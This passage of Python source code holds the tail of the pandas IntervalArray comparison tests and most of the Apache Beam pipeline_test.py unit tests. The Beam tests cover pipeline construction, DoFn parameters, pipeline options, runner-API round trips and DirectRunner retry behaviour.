        tm.assert_numpy_array_equal(result, expected)
        # matches on a single endpoint but not both
        other = Interval(array.left[0], array.right[1])
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
        tm.assert_numpy_array_equal(result, expected)
    def test_compare_scalar_interval_mixed_closed(self, op, closed, other_closed):
        array = IntervalArray.from_arrays(range(2), range(1, 3), closed=closed)
        other = Interval(0, 1, closed=other_closed)
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
        tm.assert_numpy_array_equal(result, expected)
    def test_compare_scalar_na(self, op, array, nulls_fixture, request):
        result = op(array, nulls_fixture)
        expected = self.elementwise_comparison(op, array, nulls_fixture)
        if nulls_fixture is pd.NA and array.dtype != pd.IntervalDtype("int64"):
            mark = pytest.mark.xfail(
                reason="broken for non-integer IntervalArray; see GH 31882"
            )
            request.node.add_marker(mark)
        tm.assert_numpy_array_equal(result, expected)
    @pytest.mark.parametrize(
        "other",
        [
            0,
            1.0,
            True,
            "foo",
            Timestamp("2017-01-01"),
            Timestamp("2017-01-01", tz="US/Eastern"),
            Timedelta("0 days"),
            Period("2017-01-01", "D"),
        ],
    )
    def test_compare_scalar_other(self, op, array, other):
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
        tm.assert_numpy_array_equal(result, expected)
    def test_compare_list_like_interval(self, op, array, interval_constructor):
        # same endpoints
        other = interval_constructor(array.left, array.right)
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
        tm.assert_equal(result, expected)
        # different endpoints
        other = interval_constructor(array.left[::-1], array.right[::-1])
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
        tm.assert_equal(result, expected)
        # all nan endpoints
        other = interval_constructor([np.nan] * 4, [np.nan] * 4)
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
        tm.assert_equal(result, expected)
    def test_compare_list_like_interval_mixed_closed(
        self, op, interval_constructor, closed, other_closed
    ):
        array = IntervalArray.from_arrays(range(2), range(1, 3), closed=closed)
        other = interval_constructor(range(2), range(1, 3), closed=other_closed)
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
        tm.assert_equal(result, expected)
    @pytest.mark.parametrize(
        "other",
        [
            (
                Interval(0, 1),
                Interval(Timedelta("1 day"), Timedelta("2 days")),
                Interval(4, 5, "both"),
                Interval(10, 20, "neither"),
            ),
            (0, 1.5, Timestamp("20170103"), np.nan),
            (
                Timestamp("20170102", tz="US/Eastern"),
                Timedelta("2 days"),
                "baz",
                pd.NaT,
            ),
        ],
    )
    def test_compare_list_like_object(self, op, array, other):
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
        tm.assert_numpy_array_equal(result, expected)
    def test_compare_list_like_nan(self, op, array, nulls_fixture, request):
        other = [nulls_fixture] * 4
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
        if nulls_fixture is pd.NA and array.dtype.subtype != "i8":
            reason = "broken for non-integer IntervalArray; see GH 31882"
            mark = pytest.mark.xfail(reason=reason)
            request.node.add_marker(mark)
        tm.assert_numpy_array_equal(result, expected)
    @pytest.mark.parametrize(
        "other",
        [
            np.arange(4, dtype="int64"),
            np.arange(4, dtype="float64"),
            date_range("2017-01-01", periods=4),
            date_range("2017-01-01", periods=4, tz="US/Eastern"),
            timedelta_range("0 days", periods=4),
            period_range("2017-01-01", periods=4, freq="D"),
            Categorical(list("abab")),
            Categorical(date_range("2017-01-01", periods=4)),
            pd.array(list("abcd")),
            pd.array(["foo", 3.14, None, object()], dtype=object),
        ],
        ids=lambda x: str(x.dtype),
    )
    def test_compare_list_like_other(self, op, array, other):
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
        tm.assert_numpy_array_equal(result, expected)
    @pytest.mark.parametrize("length", [1, 3, 5])
    @pytest.mark.parametrize("other_constructor", [IntervalArray, list])
    def test_compare_length_mismatch_errors(self, op, other_constructor, length):
        array = IntervalArray.from_arrays(range(4), range(1, 5))
        other = other_constructor([Interval(0, 1)] * length)
        with pytest.raises(ValueError, match="Lengths must match to compare"):
            op(array, other)
    @pytest.mark.parametrize(
        "constructor, expected_type, assert_func",
        [
            (IntervalIndex, np.array, tm.assert_numpy_array_equal),
            (Series, Series, tm.assert_series_equal),
        ],
    )
    def test_index_series_compat(self, op, constructor, expected_type, assert_func):
        # IntervalIndex/Series that rely on IntervalArray for comparisons
        breaks = range(4)
        index = constructor(IntervalIndex.from_breaks(breaks))
        # scalar comparisons
        other = index[0]
        result = op(index, other)
        expected = expected_type(self.elementwise_comparison(op, index, other))
        assert_func(result, expected)
        other = breaks[0]
        result = op(index, other)
        expected = expected_type(self.elementwise_comparison(op, index, other))
        assert_func(result, expected)
        # list-like comparisons
        other = IntervalArray.from_breaks(breaks)
        result = op(index, other)
        expected = expected_type(self.elementwise_comparison(op, index, other))
        assert_func(result, expected)
        other = [index[0], breaks[0], "foo"]
        result = op(index, other)
        expected = expected_type(self.elementwise_comparison(op, index, other))
        assert_func(result, expected)
    @pytest.mark.parametrize("scalars", ["a", False, 1, 1.0, None])
    def test_comparison_operations(self, scalars):
        # GH #28981
        expected = Series([False, False])
        s = Series([Interval(0, 1), Interval(1, 2)], dtype="interval")
        result = s == scalars
        tm.assert_series_equal(result, expected)
2b62745afefa2c17def00230565c05c0034a5011 | 25,617 | py | Python | sdks/python/apache_beam/pipeline_test.py | charithe/beam | f085cb500730cf0c67c467ac55f92b3c59f52b39 | [
"Apache-2.0"
] | 2 | 2020-06-25T00:47:43.000Z | 2020-08-24T14:25:13.000Z | sdks/python/apache_beam/pipeline_test.py | charithe/beam | f085cb500730cf0c67c467ac55f92b3c59f52b39 | [
"Apache-2.0"
] | 10 | 2017-07-20T13:38:13.000Z | 2017-08-03T15:49:24.000Z | sdks/python/apache_beam/pipeline_test.py | charithe/beam | f085cb500730cf0c67c467ac55f92b3c59f52b39 | [
"Apache-2.0"
] | 1 | 2019-08-14T00:55:53.000Z | 2019-08-14T00:55:53.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for the Pipeline class."""
from __future__ import absolute_import
import copy
import logging
import platform
import unittest
from builtins import object
from builtins import range
from collections import defaultdict
import mock
import apache_beam as beam
from apache_beam import typehints
from apache_beam.coders import BytesCoder
from apache_beam.io import Read
from apache_beam.metrics import Metrics
from apache_beam.pipeline import Pipeline
from apache_beam.pipeline import PipelineOptions
from apache_beam.pipeline import PipelineVisitor
from apache_beam.pipeline import PTransformOverride
from apache_beam.pvalue import AsSingleton
from apache_beam.runners.dataflow.native_io.iobase import NativeSource
from apache_beam.runners.direct.evaluation_context import _ExecutionContext
from apache_beam.runners.direct.transform_evaluator import _GroupByKeyOnlyEvaluator
from apache_beam.runners.direct.transform_evaluator import _TransformEvaluator
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
from apache_beam.transforms import CombineGlobally
from apache_beam.transforms import Create
from apache_beam.transforms import DoFn
from apache_beam.transforms import FlatMap
from apache_beam.transforms import Map
from apache_beam.transforms import ParDo
from apache_beam.transforms import PTransform
from apache_beam.transforms import WindowInto
from apache_beam.transforms.userstate import BagStateSpec
from apache_beam.transforms.window import SlidingWindows
from apache_beam.transforms.window import TimestampedValue
from apache_beam.utils.timestamp import MIN_TIMESTAMP
# TODO(BEAM-1555): Test is failing on the service, with FakeSource.
# from nose.plugins.attrib import attr
class FakeSource(NativeSource):
  """Fake source returning a fixed list of values."""
  class _Reader(object):
    # Iterates the fixed values, bumping the 'outputs' counter once per
    # emitted element so tests can assert on the metric.
    def __init__(self, vals):
      self._vals = vals
      self._output_counter = Metrics.counter('main', 'outputs')
    def __enter__(self):
      return self
    def __exit__(self, exception_type, exception_value, traceback):
      pass
    def __iter__(self):
      for v in self._vals:
        self._output_counter.inc()
        yield v
  def __init__(self, vals):
    self._vals = vals
  def reader(self):
    # Return a fresh reader over the fixed values.
    return FakeSource._Reader(self._vals)
class DoubleParDo(beam.PTransform):
  """Composite transform that multiplies every element by 2."""
  def expand(self, input):
    return input | 'Inner' >> beam.Map(lambda a: a * 2)
  def to_runner_api_parameter(self, context):
    # Serialize the composite by pickling for the runner-API round trip.
    return self.to_runner_api_pickled(context)
class TripleParDo(beam.PTransform):
  """Composite transform that multiplies every element by 3."""
  def expand(self, input):
    # Keeping labels the same intentionally to make sure that there is no label
    # conflict due to replacement.
    return input | 'Inner' >> beam.Map(lambda a: a * 3)
class ToStringParDo(beam.PTransform):
  """Composite transform that maps every element to its str() form."""
  def expand(self, input):
    # We use copy.copy() here to make sure the typehint mechanism doesn't
    # automatically infer that the output type is str.
    return input | 'Inner' >> beam.Map(lambda a: copy.copy(str(a)))
class PipelineTest(unittest.TestCase):
@staticmethod
def custom_callable(pcoll):
return pcoll | '+1' >> FlatMap(lambda x: [x + 1])
# Some of these tests designate a runner by name, others supply a runner.
# This variation is just to verify that both means of runner specification
# work and is not related to other aspects of the tests.
class CustomTransform(PTransform):
def expand(self, pcoll):
return pcoll | '+1' >> FlatMap(lambda x: [x + 1])
class Visitor(PipelineVisitor):
def __init__(self, visited):
self.visited = visited
self.enter_composite = []
self.leave_composite = []
def visit_value(self, value, _):
self.visited.append(value)
def enter_composite_transform(self, transform_node):
self.enter_composite.append(transform_node)
def leave_composite_transform(self, transform_node):
self.leave_composite.append(transform_node)
def test_create(self):
pipeline = TestPipeline()
pcoll = pipeline | 'label1' >> Create([1, 2, 3])
assert_that(pcoll, equal_to([1, 2, 3]))
# Test if initial value is an iterator object.
pcoll2 = pipeline | 'label2' >> Create(iter((4, 5, 6)))
pcoll3 = pcoll2 | 'do' >> FlatMap(lambda x: [x + 10])
assert_that(pcoll3, equal_to([14, 15, 16]), label='pcoll3')
pipeline.run()
def test_flatmap_builtin(self):
pipeline = TestPipeline()
pcoll = pipeline | 'label1' >> Create([1, 2, 3])
assert_that(pcoll, equal_to([1, 2, 3]))
pcoll2 = pcoll | 'do' >> FlatMap(lambda x: [x + 10])
assert_that(pcoll2, equal_to([11, 12, 13]), label='pcoll2')
pcoll3 = pcoll2 | 'm1' >> Map(lambda x: [x, 12])
assert_that(pcoll3,
equal_to([[11, 12], [12, 12], [13, 12]]), label='pcoll3')
pcoll4 = pcoll3 | 'do2' >> FlatMap(set)
assert_that(pcoll4, equal_to([11, 12, 12, 12, 13]), label='pcoll4')
pipeline.run()
def test_maptuple_builtin(self):
pipeline = TestPipeline()
pcoll = pipeline | Create([('e1', 'e2')])
side1 = beam.pvalue.AsSingleton(pipeline | 'side1' >> Create(['s1']))
side2 = beam.pvalue.AsSingleton(pipeline | 'side2' >> Create(['s2']))
# A test function with a tuple input, an auxiliary parameter,
# and some side inputs.
fn = lambda e1, e2, t=DoFn.TimestampParam, s1=None, s2=None: (
e1, e2, t, s1, s2)
assert_that(pcoll | 'NoSides' >> beam.core.MapTuple(fn),
equal_to([('e1', 'e2', MIN_TIMESTAMP, None, None)]),
label='NoSidesCheck')
assert_that(pcoll | 'StaticSides' >> beam.core.MapTuple(fn, 's1', 's2'),
equal_to([('e1', 'e2', MIN_TIMESTAMP, 's1', 's2')]),
label='StaticSidesCheck')
assert_that(pcoll | 'DynamicSides' >> beam.core.MapTuple(fn, side1, side2),
equal_to([('e1', 'e2', MIN_TIMESTAMP, 's1', 's2')]),
label='DynamicSidesCheck')
assert_that(pcoll | 'MixedSides' >> beam.core.MapTuple(fn, s2=side2),
equal_to([('e1', 'e2', MIN_TIMESTAMP, None, 's2')]),
label='MixedSidesCheck')
pipeline.run()
def test_flatmaptuple_builtin(self):
pipeline = TestPipeline()
pcoll = pipeline | Create([('e1', 'e2')])
side1 = beam.pvalue.AsSingleton(pipeline | 'side1' >> Create(['s1']))
side2 = beam.pvalue.AsSingleton(pipeline | 'side2' >> Create(['s2']))
# A test function with a tuple input, an auxiliary parameter,
# and some side inputs.
fn = lambda e1, e2, t=DoFn.TimestampParam, s1=None, s2=None: (
e1, e2, t, s1, s2)
assert_that(pcoll | 'NoSides' >> beam.core.FlatMapTuple(fn),
equal_to(['e1', 'e2', MIN_TIMESTAMP, None, None]),
label='NoSidesCheck')
assert_that(pcoll | 'StaticSides' >> beam.core.FlatMapTuple(fn, 's1', 's2'),
equal_to(['e1', 'e2', MIN_TIMESTAMP, 's1', 's2']),
label='StaticSidesCheck')
assert_that(pcoll
| 'DynamicSides' >> beam.core.FlatMapTuple(fn, side1, side2),
equal_to(['e1', 'e2', MIN_TIMESTAMP, 's1', 's2']),
label='DynamicSidesCheck')
assert_that(pcoll | 'MixedSides' >> beam.core.FlatMapTuple(fn, s2=side2),
equal_to(['e1', 'e2', MIN_TIMESTAMP, None, 's2']),
label='MixedSidesCheck')
pipeline.run()
def test_create_singleton_pcollection(self):
pipeline = TestPipeline()
pcoll = pipeline | 'label' >> Create([[1, 2, 3]])
assert_that(pcoll, equal_to([[1, 2, 3]]))
pipeline.run()
# TODO(BEAM-1555): Test is failing on the service, with FakeSource.
# @attr('ValidatesRunner')
def test_metrics_in_fake_source(self):
pipeline = TestPipeline()
pcoll = pipeline | Read(FakeSource([1, 2, 3, 4, 5, 6]))
assert_that(pcoll, equal_to([1, 2, 3, 4, 5, 6]))
res = pipeline.run()
metric_results = res.metrics().query()
outputs_counter = metric_results['counters'][0]
self.assertEqual(outputs_counter.key.step, 'Read')
self.assertEqual(outputs_counter.key.metric.name, 'outputs')
self.assertEqual(outputs_counter.committed, 6)
def test_fake_read(self):
pipeline = TestPipeline()
pcoll = pipeline | 'read' >> Read(FakeSource([1, 2, 3]))
assert_that(pcoll, equal_to([1, 2, 3]))
pipeline.run()
def test_visit_entire_graph(self):
pipeline = Pipeline()
pcoll1 = pipeline | 'pcoll' >> Create([1, 2, 3])
pcoll2 = pcoll1 | 'do1' >> FlatMap(lambda x: [x + 1])
pcoll3 = pcoll2 | 'do2' >> FlatMap(lambda x: [x + 1])
pcoll4 = pcoll2 | 'do3' >> FlatMap(lambda x: [x + 1])
transform = PipelineTest.CustomTransform()
pcoll5 = pcoll4 | transform
visitor = PipelineTest.Visitor(visited=[])
pipeline.visit(visitor)
self.assertEqual(set([pcoll1, pcoll2, pcoll3, pcoll4, pcoll5]),
set(visitor.visited))
self.assertEqual(set(visitor.enter_composite),
set(visitor.leave_composite))
self.assertEqual(3, len(visitor.enter_composite))
self.assertEqual(visitor.enter_composite[2].transform, transform)
self.assertEqual(visitor.leave_composite[1].transform, transform)
def test_apply_custom_transform(self):
pipeline = TestPipeline()
pcoll = pipeline | 'pcoll' >> Create([1, 2, 3])
result = pcoll | PipelineTest.CustomTransform()
assert_that(result, equal_to([2, 3, 4]))
pipeline.run()
def test_reuse_custom_transform_instance(self):
pipeline = Pipeline()
pcoll1 = pipeline | 'pcoll1' >> Create([1, 2, 3])
pcoll2 = pipeline | 'pcoll2' >> Create([4, 5, 6])
transform = PipelineTest.CustomTransform()
pcoll1 | transform
with self.assertRaises(RuntimeError) as cm:
pipeline.apply(transform, pcoll2)
self.assertEqual(
cm.exception.args[0],
'Transform "CustomTransform" does not have a stable unique label. '
'This will prevent updating of pipelines. '
'To apply a transform with a specified label write '
'pvalue | "label" >> transform')
def test_reuse_cloned_custom_transform_instance(self):
pipeline = TestPipeline()
pcoll1 = pipeline | 'pc1' >> Create([1, 2, 3])
pcoll2 = pipeline | 'pc2' >> Create([4, 5, 6])
transform = PipelineTest.CustomTransform()
result1 = pcoll1 | transform
result2 = pcoll2 | 'new_label' >> transform
assert_that(result1, equal_to([2, 3, 4]), label='r1')
assert_that(result2, equal_to([5, 6, 7]), label='r2')
pipeline.run()
def test_transform_no_super_init(self):
class AddSuffix(PTransform):
def __init__(self, suffix):
# No call to super(...).__init__
self.suffix = suffix
def expand(self, pcoll):
return pcoll | Map(lambda x: x + self.suffix)
self.assertEqual(
['a-x', 'b-x', 'c-x'],
sorted(['a', 'b', 'c'] | 'AddSuffix' >> AddSuffix('-x')))
  @unittest.skip("Fails on some platforms with new urllib3.")
  def test_memory_usage(self):
    """Peak RSS must not grow with the number of chained Map stages.

    The threshold allows roughly five copies of the created data plus a
    small slack; exceeding it means the runner retains elements per map.
    """
    try:
      import resource
    except ImportError:
      # Skip the test if resource module is not available (e.g. non-Unix os).
      self.skipTest('resource module not available.')
    if platform.mac_ver()[0]:
      # Skip the test on macos, depending on version it returns ru_maxrss in
      # different units.
      self.skipTest('ru_maxrss is not in standard units.')
    def get_memory_usage_in_bytes():
      # Scales ru_maxrss by 2**10 — assumes KiB units (hence the macOS skip).
      return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * (2 ** 10)
    def check_memory(value, memory_threshold):
      # Identity map that raises if the process has grown past the threshold.
      memory_usage = get_memory_usage_in_bytes()
      if memory_usage > memory_threshold:
        raise RuntimeError(
            'High memory usage: %d > %d' % (memory_usage, memory_threshold))
      return value
    len_elements = 1000000
    num_elements = 10
    num_maps = 100
    # TODO(robertwb): reduce memory usage of FnApiRunner so that this test
    # passes.
    pipeline = TestPipeline(runner='BundleBasedDirectRunner')
    # Consumed memory should not be proportional to the number of maps.
    memory_threshold = (
        get_memory_usage_in_bytes() + (5 * len_elements * num_elements))
    # Plus small additional slack for memory fluctuations during the test.
    memory_threshold += 10 * (2 ** 20)
    biglist = pipeline | 'oom:create' >> Create(
        ['x' * len_elements] * num_elements)
    for i in range(num_maps):
      biglist = biglist | ('oom:addone-%d' % i) >> Map(lambda x: x + 'y')
    result = biglist | 'oom:check' >> Map(check_memory, memory_threshold)
    assert_that(result, equal_to(
        ['x' * len_elements + 'y' * num_maps] * num_elements))
    pipeline.run()
def test_aggregator_empty_input(self):
actual = [] | CombineGlobally(max).without_defaults()
self.assertEqual(actual, [])
def test_pipeline_as_context(self):
def raise_exception(exn):
raise exn
with self.assertRaises(ValueError):
with Pipeline() as p:
# pylint: disable=expression-not-assigned
p | Create([ValueError('msg')]) | Map(raise_exception)
# TODO(BEAM-1894).
# def test_eager_pipeline(self):
# p = Pipeline('EagerRunner')
# self.assertEqual([1, 4, 9], p | Create([1, 2, 3]) | Map(lambda x: x*x))
  @mock.patch(
      'apache_beam.runners.direct.direct_runner._get_transform_overrides')
  def test_ptransform_overrides(self, file_system_override_mock):
    """A runner-supplied PTransformOverride replaces matching transforms.

    The mocked override hook swaps DoubleParDo for TripleParDo, so the
    output is the tripled input rather than the doubled one.
    """
    class MyParDoOverride(PTransformOverride):
      def matches(self, applied_ptransform):
        return isinstance(applied_ptransform.transform, DoubleParDo)
      def get_replacement_transform(self, ptransform):
        if isinstance(ptransform, DoubleParDo):
          return TripleParDo()
        raise ValueError('Unsupported type of transform: %r' % ptransform)
    def get_overrides(unused_pipeline_options):
      return [MyParDoOverride()]
    file_system_override_mock.side_effect = get_overrides
    # Specify DirectRunner as it's the one patched above.
    with Pipeline(runner='BundleBasedDirectRunner') as p:
      pcoll = p | beam.Create([1, 2, 3]) | 'Multiply' >> DoubleParDo()
      assert_that(pcoll, equal_to([3, 6, 9]))
  def test_ptransform_override_type_hints(self):
    """Replacement transforms carry their declared type hints.

    Without hints, the replaced output's element type falls back to Any;
    with explicit with_input_types/with_output_types, the hints are kept.
    """
    class NoTypeHintOverride(PTransformOverride):
      def matches(self, applied_ptransform):
        return isinstance(applied_ptransform.transform, DoubleParDo)
      def get_replacement_transform(self, ptransform):
        return ToStringParDo()
    class WithTypeHintOverride(PTransformOverride):
      def matches(self, applied_ptransform):
        return isinstance(applied_ptransform.transform, DoubleParDo)
      def get_replacement_transform(self, ptransform):
        return (ToStringParDo()
                .with_input_types(int)
                .with_output_types(str))
    for override, expected_type in [(NoTypeHintOverride(), typehints.Any),
                                    (WithTypeHintOverride(), str)]:
      p = TestPipeline()
      pcoll = (p
               | beam.Create([1, 2, 3])
               | 'Operate' >> DoubleParDo()
               | 'NoOp' >> beam.Map(lambda x: x))
      p.replace_all([override])
      # pcoll.producer is the 'NoOp' Map; its input is the (replaced)
      # 'Operate' stage's output PCollection.
      self.assertEqual(pcoll.producer.inputs[0].element_type, expected_type)
  def test_kv_ptransform_honor_type_hints(self):
    """Explicit output type hints win when inference cannot determine a type.

    Without with_output_types the element type is Any; with it, it is str.
    """
    # The return type of this DoFn cannot be inferred by the default
    # Beam type inference
    class StatefulDoFn(DoFn):
      BYTES_STATE = BagStateSpec('bytes', BytesCoder())
      def return_recursive(self, count):
        if count == 0:
          return ["some string"]
        else:
          # NOTE(review): no `return` on this branch, so count > 0 yields
          # None — presumably deliberate to defeat type inference; confirm
          # before "fixing".
          self.return_recursive(count-1)
      def process(self, element, counter=DoFn.StateParam(BYTES_STATE)):
        return self.return_recursive(1)
    p = TestPipeline()
    pcoll = (p
             | beam.Create([(1, 1), (2, 2), (3, 3)])
             | beam.GroupByKey()
             | beam.ParDo(StatefulDoFn()))
    p.run()
    self.assertEqual(pcoll.element_type, typehints.Any)
    p = TestPipeline()
    pcoll = (p
             | beam.Create([(1, 1), (2, 2), (3, 3)])
             | beam.GroupByKey()
             | beam.ParDo(StatefulDoFn()).with_output_types(str))
    p.run()
    self.assertEqual(pcoll.element_type, str)
class DoFnTest(unittest.TestCase):
  """Tests for DoFn parameter handling: elements, side inputs, window and
  timestamp parameters."""
  def test_element(self):
    """process() receives each element as the first positional argument."""
    class TestDoFn(DoFn):
      def process(self, element):
        yield element + 10
    pipeline = TestPipeline()
    pcoll = pipeline | 'Create' >> Create([1, 2]) | 'Do' >> ParDo(TestDoFn())
    assert_that(pcoll, equal_to([11, 12]))
    pipeline.run()
  def test_side_input_no_tag(self):
    """Side inputs can be passed positionally and by keyword without tags."""
    class TestDoFn(DoFn):
      def process(self, element, prefix, suffix):
        return ['%s-%s-%s' % (prefix, element, suffix)]
    pipeline = TestPipeline()
    words_list = ['aa', 'bb', 'cc']
    words = pipeline | 'SomeWords' >> Create(words_list)
    prefix = 'zyx'
    suffix = pipeline | 'SomeString' >> Create(['xyz']) # side in
    result = words | 'DecorateWordsDoFnNoTag' >> ParDo(
        TestDoFn(), prefix, suffix=AsSingleton(suffix))
    assert_that(result, equal_to(['zyx-%s-xyz' % x for x in words_list]))
    pipeline.run()
  def test_side_input_tagged(self):
    """Side input declared via a DoFn.SideInputParam default argument.

    NOTE(review): the body and transform label duplicate
    test_side_input_no_tag ('DecorateWordsDoFnNoTag') — possibly a
    copy-paste leftover; confirm the intended label before renaming.
    """
    class TestDoFn(DoFn):
      def process(self, element, prefix, suffix=DoFn.SideInputParam):
        return ['%s-%s-%s' % (prefix, element, suffix)]
    pipeline = TestPipeline()
    words_list = ['aa', 'bb', 'cc']
    words = pipeline | 'SomeWords' >> Create(words_list)
    prefix = 'zyx'
    suffix = pipeline | 'SomeString' >> Create(['xyz']) # side in
    result = words | 'DecorateWordsDoFnNoTag' >> ParDo(
        TestDoFn(), prefix, suffix=AsSingleton(suffix))
    assert_that(result, equal_to(['zyx-%s-xyz' % x for x in words_list]))
    pipeline.run()
  def test_window_param(self):
    """DoFn.WindowParam injects the element's window (SlidingWindows here)."""
    class TestDoFn(DoFn):
      def process(self, element, window=DoFn.WindowParam):
        yield (element, (float(window.start), float(window.end)))
    pipeline = TestPipeline()
    pcoll = (pipeline
             | Create([1, 7])
             | Map(lambda x: TimestampedValue(x, x))
             | WindowInto(windowfn=SlidingWindows(10, 5))
             | ParDo(TestDoFn()))
    assert_that(pcoll, equal_to([(1, (-5, 5)), (1, (0, 10)),
                                 (7, (0, 10)), (7, (5, 15))]))
    # Applying the DoFn again pairs each element with its window a 2nd time.
    pcoll2 = pcoll | 'Again' >> ParDo(TestDoFn())
    assert_that(
        pcoll2,
        equal_to([
            ((1, (-5, 5)), (-5, 5)), ((1, (0, 10)), (0, 10)),
            ((7, (0, 10)), (0, 10)), ((7, (5, 15)), (5, 15))]),
        label='doubled windows')
    pipeline.run()
  def test_timestamp_param(self):
    """DoFn.TimestampParam defaults to MIN_TIMESTAMP for unstamped input."""
    class TestDoFn(DoFn):
      def process(self, element, timestamp=DoFn.TimestampParam):
        yield timestamp
    pipeline = TestPipeline()
    pcoll = pipeline | 'Create' >> Create([1, 2]) | 'Do' >> ParDo(TestDoFn())
    assert_that(pcoll, equal_to([MIN_TIMESTAMP, MIN_TIMESTAMP]))
    pipeline.run()
  def test_timestamp_param_map(self):
    """TimestampParam also works as a default argument of a Map callable."""
    with TestPipeline() as p:
      assert_that(
          p | Create([1, 2]) | beam.Map(lambda _, t=DoFn.TimestampParam: t),
          equal_to([MIN_TIMESTAMP, MIN_TIMESTAMP]))
class Bacon(PipelineOptions):
  """PipelineOptions subclass contributing the --slices flag."""
  @classmethod
  def _add_argparse_args(cls, parser):
    parser.add_argument('--slices', type=int)
class Eggs(PipelineOptions):
  """PipelineOptions subclass contributing --style (default 'scrambled')."""
  @classmethod
  def _add_argparse_args(cls, parser):
    parser.add_argument('--style', default='scrambled')
class Breakfast(Bacon, Eggs):
  """Combined options view exposing both --slices and --style."""
  pass
class PipelineOptionsTest(unittest.TestCase):
  """Tests for PipelineOptions flag parsing, view_as() and attributes."""
  def test_flag_parsing(self):
    """Known flags are parsed; unknown flags (--ignored) are tolerated."""
    options = Breakfast(['--slices=3', '--style=sunny side up', '--ignored'])
    self.assertEqual(3, options.slices)
    self.assertEqual('sunny side up', options.style)
  def test_keyword_parsing(self):
    """Keyword arguments override values parsed from flags."""
    options = Breakfast(
        ['--slices=3', '--style=sunny side up', '--ignored'],
        slices=10)
    self.assertEqual(10, options.slices)
    self.assertEqual('sunny side up', options.style)
  def test_attribute_setting(self):
    """Option attributes can be assigned after construction."""
    options = Breakfast(slices=10)
    self.assertEqual(10, options.slices)
    options.slices = 20
    self.assertEqual(20, options.slices)
  def test_view_as(self):
    """view_as() exposes shared state; unknown attrs raise AttributeError."""
    generic_options = PipelineOptions(['--slices=3'])
    self.assertEqual(3, generic_options.view_as(Bacon).slices)
    self.assertEqual(3, generic_options.view_as(Breakfast).slices)
    # Writes through one view are visible through the others.
    generic_options.view_as(Breakfast).slices = 10
    self.assertEqual(10, generic_options.view_as(Bacon).slices)
    with self.assertRaises(AttributeError):
      generic_options.slices # pylint: disable=pointless-statement
    with self.assertRaises(AttributeError):
      generic_options.view_as(Eggs).slices # pylint: disable=expression-not-assigned
  def test_defaults(self):
    """Unspecified options fall back to their declared defaults."""
    options = Breakfast(['--slices=3'])
    self.assertEqual(3, options.slices)
    self.assertEqual('scrambled', options.style)
  def test_dir(self):
    """dir() exposes exactly the public API plus the declared options."""
    options = Breakfast()
    self.assertEqual(
        set(['from_dictionary', 'get_all_options', 'slices', 'style',
             'view_as', 'display_data']),
        set([attr for attr in dir(options) if not attr.startswith('_') and
             attr != 'next']))
    self.assertEqual(
        set(['from_dictionary', 'get_all_options', 'style', 'view_as',
             'display_data']),
        set([attr for attr in dir(options.view_as(Eggs))
             if not attr.startswith('_') and attr != 'next']))
class RunnerApiTest(unittest.TestCase):
  """Round-trip checks for the Runner API (proto) pipeline representation."""
  def test_parent_pointer(self):
    """from_runner_api must rebuild parent links in the transform tree."""
    class MyPTransform(beam.PTransform):
      def expand(self, p):
        self.p = p
        return p | beam.Create([None])
    p = beam.Pipeline()
    p | MyPTransform() # pylint: disable=expression-not-assigned
    # Serialize to the runner API proto and deserialize back.
    p = Pipeline.from_runner_api(
        Pipeline.to_runner_api(p, use_fake_coders=True), None, None)
    self.assertIsNotNone(p.transforms_stack[0].parts[0].parent)
    self.assertEqual(p.transforms_stack[0].parts[0].parent,
                     p.transforms_stack[0])
class DirectRunnerRetryTests(unittest.TestCase):
  """Bundle-retry semantics of the (bundle-based) DirectRunner."""
  def test_retry_fork_graph(self):
    """Both branches of a fork are retried the same number of times.

    The final assert pins 4 invocations per branch (initial attempt plus
    retries) when every element raises.
    """
    # TODO(BEAM-3642): The FnApiRunner currently does not currently support
    # retries.
    p = beam.Pipeline(runner='BundleBasedDirectRunner')
    # TODO(mariagh): Remove the use of globals from the test.
    global count_b, count_c # pylint: disable=global-variable-undefined
    count_b, count_c = 0, 0
    def f_b(x):
      global count_b # pylint: disable=global-variable-undefined
      count_b += 1
      raise Exception('exception in f_b')
    def f_c(x):
      global count_c # pylint: disable=global-variable-undefined
      count_c += 1
      raise Exception('exception in f_c')
    names = p | 'CreateNodeA' >> beam.Create(['Ann', 'Joe'])
    fork_b = names | 'SendToB' >> beam.Map(f_b) # pylint: disable=unused-variable
    fork_c = names | 'SendToC' >> beam.Map(f_c) # pylint: disable=unused-variable
    with self.assertRaises(Exception):
      p.run().wait_until_finish()
    assert count_b == count_c == 4
  def test_no_partial_writeouts(self):
    """Uncommitted state stays in partial_keyed_state until the bundle commits.

    After a reset (simulated failure) reprocessing starts from a clean
    partial state, so no half-written values leak into committed state.
    """
    class TestTransformEvaluator(_TransformEvaluator):
      def __init__(self):
        self._execution_context = _ExecutionContext(None, {})
      def start_bundle(self):
        self.step_context = self._execution_context.get_step_context()
      def process_element(self, element):
        k, v = element
        state = self.step_context.get_keyed_state(k)
        state.add_state(None, _GroupByKeyOnlyEvaluator.ELEMENTS_TAG, v)
    # Create instance and add key/value, key/value2
    evaluator = TestTransformEvaluator()
    evaluator.start_bundle()
    self.assertIsNone(evaluator.step_context.existing_keyed_state.get('key'))
    self.assertIsNone(evaluator.step_context.partial_keyed_state.get('key'))
    evaluator.process_element(['key', 'value'])
